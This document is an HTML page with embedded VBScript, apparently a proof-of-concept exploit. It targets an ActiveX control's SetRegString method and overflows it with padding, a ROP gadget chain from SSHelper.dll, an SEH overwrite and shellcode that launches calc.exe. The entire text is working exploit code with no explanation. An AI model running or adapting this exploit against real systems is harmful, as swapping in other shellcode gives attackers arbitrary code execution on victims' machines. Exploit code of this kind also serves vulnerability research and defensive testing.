Código
<html> <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target'></object> <script language='vbscript'> junk1 = String(72, "A") junk2 = String(3184, "B") junk3 = String(25000, "C") nop1 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop2 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop3 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop4 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop5 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop6 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop7 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN nop = nop1 + nop2 + nop3 + nop4 + nop5 + nop6 + nop7 rop1 = unescape("%33%b6%44%06") ' SSHelper.dll | POP EBP / RETN rop2 = unescape("%10%c0%1f%06") ' SSHelper.dll rop3 = unescape("%65%b9%47%06") ' SSHelper.dll | MOV EDX,EBP / POP EDI / POP ESI / POP EBP / POP EBX / POP ECX / RETN rop4 = unescape("%51%a5%45%06") ' SSHelper.dll | CALL EAX rop5 = unescape("%ff%ff%ff%ff") ' 0xFFFFFFFF rop6 = unescape("%6c%c4%24%23") ' 0x2324C46C rop7 = unescape("%49%cc%ba%f9") ' 0xF9BACC49 rop8 = unescape("%aa%aa%aa%aa") ' 0xAAAAAAAA rop9 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN rop10 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN rop11 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN rop12 = unescape("%0e%37%45%06") ' SSHelper.dll | MOV EAX,0x64536B7 / RETN rop13 = unescape("%d9%c4%47%06") ' SSHelper.dll | ADD EBX,EAX / PUSH 0x1 / POP EAX / RETN rop14 = unescape("%05%67%47%06") ' SSHelper.dll | POP EAX / RETN rop15 = unescape("%b0%c3%24%23") ' 0x2324C3B0 rop16 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN rop17 = unescape("%71%03%4a%06") ' SSHelper.dll | PUSHAD / ADD AL,0x0 / RETN ROPgadgets = nop + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8 + rop9 + rop10 + rop11 + rop12 + rop13 + rop14 + rop15 + rop16 + rop17 SEH = unescape("%13%16%47%06") ' SSHelper.dll | ADD ESP,0x46C payload =unescape( "%fc%e8%89%00%00%00%60%89%e5%31%d2%64%8b%52" & _ "%30%8b%52%0c%8b%52%14%8b%72%28%0f%b7%4a%26" & _ "%31%ff%31%c0%ac%3c%61%7c%02%2c%20%c1%cf%0d" & _ "%01%c7%e2%f0%52%57%8b%52%10%8b%42%3c%01%d0" & _ "%8b%40%78%85%c0%74%4a%01%d0%50%8b%48%18%8b" & _ "%58%20%01%d3%e3%3c%49%8b%34%8b%01%d6%31%ff" & _ "%31%c0%ac%c1%cf%0d%01%c7%38%e0%75%f4%03%7d" & _ "%f8%3b%7d%24%75%e2%58%8b%58%24%01%d3%66%8b" & _ "%0c%4b%8b%58%1c%01%d3%8b%04%8b%01%d0%89%44" & _ "%24%24%5b%5b%61%59%5a%51%ff%e0%58%5f%5a%8b" & _ "%12%eb%86%5d%6a%01%8d%85%b9%00%00%00%50%68" & _ "%31%8b%6f%87%ff%d5%bb%f0%b5%a2%56%68%a6%95" & _ "%bd%9d%ff%d5%3c%06%7c%0a%80%fb%e0%75%05%bb" & _ "%47%13%72%6f%6a%00%53%ff%d5%63%61%6c%63%2e" & _ "%65%78%65%00") arg1 = 1 arg2 = 1 arg3 = junk1 + ROPgadgets + junk2 + SEH + payload + junk3 arg4 = "defaultV" arg5 = "defaultV" target.SetRegString arg1, arg2, arg3, arg4, arg5 </script> </html>